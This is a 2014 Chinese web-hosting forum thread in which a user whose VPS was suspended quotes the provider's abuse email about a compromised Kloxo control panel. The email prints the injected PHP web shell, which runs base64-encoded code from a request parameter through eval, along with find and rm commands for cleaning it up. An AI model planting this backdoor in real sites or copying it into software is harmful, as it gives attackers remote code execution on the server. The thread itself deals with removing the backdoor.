宇宙主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

欧基零壹微头条IP归属甄别会员请立即修改密码
查看: 3358|回复: 6

[经验] 求助 VPS给停了,,不肯开通。。。

[复制链接]
发表于 2014-2-8 09:44:04 | 显示全部楼层 |阅读模式
过年回家,photonvps 停了我的VPS,现在死不肯开通,都不知怎办,VPS上,过年前网站的数据也没有备份,现在想叫开通后备份下,下面为对话,现怎办呢?


photonvps
This is a easy fix give me the credentials ill fix it for you.




I now know is the VPS control panel of a loophole, but now I cannot link to repair, also want to put the site data backup, backup and then reinstall the VPS, in the control panel, can you help me to open the VPS, let me make this operation?



photonvps
You are not reading the emails we sent you that your kloxo has an exploit that we needed you to clean it? I am sorry but if you ignore us we wont be able to help you with these type of abuse.
Your kloxo has an exploit you needed to clean it but you ignore us so we suspended you to stop attacks from your VM. If you want us to help you give us your server credentials, otherwise we are going to terminate this account.




Why stop my VPS




photonvps
Hello,

You account has been suspended because you did not respond to the abuse ticket within 24 hours.

Thank you.

Hello,

This is abuse department sending you an important email alert of a backdoor botnet exploit with your kloxo panel that needs fixing ASAP!

This problem was brought to our attention by alerts that we received from banks that were receiving attacks from your control panel and other forms of virus detections.

Fortunately this exploit can be fixed by following the instructions listed below.

Find files that were modified on the 27th ot this month.

find /home/kloxo/httpd/default/* -mtime -4 -iname "*.php"

You should get something similar to this

/home/kloxo/httpd/default/default.php
/home/kloxo/httpd/default/defuzx.php
/home/kloxo/httpd/default/emptzx.php


the defuzx.php, and emptzx.php files were uploaded, and are the exploit that needs deleting.

You can check inspect the backdoor code that was injected by the hacker to gain access to your account.


<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['36753c7000fab6fec6700cbf0ef8'])!=NULL){eval(base64_decode($_REQUEST['36753c7000fab6fec6700cbf0ef8']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>

To remove the exploit we do

rm -fr /home/kloxo/httpd/default/emptzx.php

rm -fr /home/kloxo/httpd/default/defuzx.php

make sure to only delete the files that were modified on the 27. the default.php file change due to the kloxo being hack so to fix that we need to update kloxo and change the admin password.

Update kloxo “/scripts/upcp”
Then finalize the fix by changing your kloxo admin panel password.
发表于 2014-2-8 09:48:25 | 显示全部楼层
貌似没说不给开通吧,  叫你修复一下漏洞 ?
 楼主| 发表于 2014-2-8 09:50:49 | 显示全部楼层
分享吧 发表于 2014-2-8 09:48
貌似没说不给开通吧,  叫你修复一下漏洞 ?

问题,是链接不上,修复不了
 楼主| 发表于 2014-2-8 09:52:21 | 显示全部楼层

好像是面板问题,KLOXO有漏洞,没有及时修复。
发表于 2014-2-8 09:59:23 | 显示全部楼层
vielang 发表于 2014-2-8 09:50
问题,是链接不上,修复不了

好吧, 我拙计了。。
发表于 2014-2-8 11:20:18 | 显示全部楼层
Kloxo最近集体废了
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|宇宙主机交流论坛

GMT+8, 2024-10-31 13:20 , Processed in 0.272938 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表